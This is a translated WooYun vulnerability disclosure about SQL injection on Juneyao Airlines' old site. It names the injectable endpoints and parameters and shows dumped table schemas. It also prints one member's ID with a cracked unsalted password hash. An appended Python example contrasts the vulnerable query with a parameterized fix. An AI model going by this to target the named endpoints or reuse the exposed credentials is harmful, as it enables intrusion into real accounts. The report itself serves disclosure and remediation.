
Vulnerability Summary

Defect ID: wooyun-2013-047254

Title: POST injection on a Juneyao Airlines site leaks passwords and other sensitive information of 1.7 million users

Vendor: www.juneyaoair.com

Author: 爱上襄阳

Submitted: 2013-12-28 17:47

Fixed: 2014-02-11 17:48

Published: 2014-02-11 17:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 17

Status: Handed to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team of China) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2013-12-28: Details sent to the vendor, awaiting the vendor's response
2013-12-31: Vendor confirmed; details visible to the vendor only
2014-01-10: Details disclosed to core white hats and domain experts
2014-01-20: Details disclosed to regular white hats
2014-01-30: Details disclosed to intern white hats
2014-02-11: Details disclosed to the public

Brief description:

POST injection on a Juneyao Airlines site leaks passwords and other sensitive information of 1.7 million users

Detailed description:

Juneyao Airlines' old site: http://2012b2c.juneyaoair.com/
The database behind it is still the old one: I registered an account and it works on both the new site and the old site.
Injection points:
http://2012b2c.juneyaoair.com/crmInterLogin.do  POST body: loginPwdId=123456&loginNameId=123456  (the loginNameId parameter needs filtering)
http://2012b2c.juneyaoair.com/resetPwd.do  POST body: loginType=1&sendType=1&id=88952634  (the id parameter needs filtering)
Dumping the database:

(screenshot: 2013-12-28 16-53-04.png)


Dumping the tables of the current database:
Database: HOFFP
[181 tables]
Dumping the users table, which is presumably the back-office admin table:
Table: TBL_USERS
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| COMMENTS | VARCHAR2 |
| DEPARTMENT_CODE | VARCHAR2 |
| OPERATE_DATE | DATE |
| OPERATE_USER_ID | VARCHAR2 |
| STATUS | VARCHAR2 |
| UPDATE_DATE | DATE |
| UPDATE_USER_ID | VARCHAR2 |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PASSWORD | VARCHAR2 |
+-----------------+----------+
160-odd back-office users:

(screenshot: 2013-12-28 16-55-21.png)


Dumping member information:
Database: HOFFP
Table: TBL_MEMBER_PASSWORD
[12 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| B2C_PASSWORD | VARCHAR2 |
| COMMENTS | VARCHAR2 |
| ID | NUMBER |
| MEMBER_ID | VARCHAR2 |
| OPERATE_DATE | DATE |
| OPERATE_USER_ID | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PSW_STATUS | VARCHAR2 |
| RESET_ANSWER | VARCHAR2 |
| RESET_QUESTION | VARCHAR2 |
| UPDATE_DATE | DATE |
| UPDATE_USER_ID | VARCHAR2 |
+-----------------+----------+
User login account and password data:

(screenshot: 2013-12-28 16-26-41.png)


Proof of vulnerability:

Trying to log in with one of the accounts:
| 1801053115 | zhangting 6456C7FAC445F3C1C3E7F4405159D80
After a second round of decryption, the password turns out to be six 1s.

(screenshot: 2013-12-28 17-06-07.png)


Suggested fix:

Filter the input and fix the query.
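The report's fix advice is one line, so here is what it means in practice, as an added example that is not part of the original report or the vendor's code: the string-concatenation pattern behind crmInterLogin.do beside a hardened login that binds the loginNameId value as a parameter, allow-lists it, and stores passwords with a salted PBKDF2 hash instead of the unsalted hash that was recovered as "111111". The table is a constructed in-memory SQLite stand-in for HOFFP.TBL_MEMBER_PASSWORD (Oracle in the original); the member ID is the one shown in the report, the password hash is freshly generated.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed stand-in for HOFFP.TBL_MEMBER_PASSWORD (Oracle in the report;
# in-memory SQLite here so the example runs offline).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE TBL_MEMBER_PASSWORD "
               "(MEMBER_ID TEXT PRIMARY KEY, PASSWORD TEXT)")
    db.execute("INSERT INTO TBL_MEMBER_PASSWORD VALUES (?, ?)",
               ("1801053115", hash_password("111111")))
    return db

def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'salt$digest' (hex)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored):
    salt_hex, _ = stored.split("$")
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)  # constant-time compare

def login_vulnerable(db, login_name):
    """The defect pattern: loginNameId concatenated into the SQL text, so a
    quote in the input reaches the SQL parser instead of staying data."""
    sql = ("SELECT MEMBER_ID, PASSWORD FROM TBL_MEMBER_PASSWORD "
           "WHERE MEMBER_ID = '" + login_name + "'")
    return db.execute(sql).fetchone()

def login_fixed(db, login_name, password):
    """Hardened form: allow-list the identifier, bind it as a parameter,
    and compare the salted hash in constant time."""
    if not login_name.isalnum() or len(login_name) > 20:
        return False
    row = db.execute("SELECT PASSWORD FROM TBL_MEMBER_PASSWORD "
                     "WHERE MEMBER_ID = ?", (login_name,)).fetchone()
    return row is not None and verify_password(password, row[0])

def input_reaches_parser(db, login_name):
    """Defender check: True if the input altered the SQL (parse error)
    rather than being treated purely as data."""
    try:
        login_vulnerable(db, login_name)
        return False
    except sqlite3.OperationalError:
        return True
```

A quick way to audit an endpoint is the last function's idea: if a stray quote in a field produces a database error, the field is concatenated into SQL and must be bound as a parameter.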

Copyright notice: when reposting, please credit 爱上襄阳@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2013-12-31 10:11

Vendor reply:

CNVD has confirmed the reported situation and has contacted the website's operating organization and its administrators through public channels for handling.

Latest status:

None yet


Vulnerability Comments:

Comments

  1. 2013-12-28 18:44 | 丹木秋风 ( Passer-by | Rank:10 Vulnerabilities:1 | NULL)

    Damn, second!

  2. 2013-12-28 18:48 | 丹木秋风 ( Passer-by | Rank:10 Vulnerabilities:1 | NULL)

    @丹木秋风 Looks like the file has been deleted; seems I got here too late.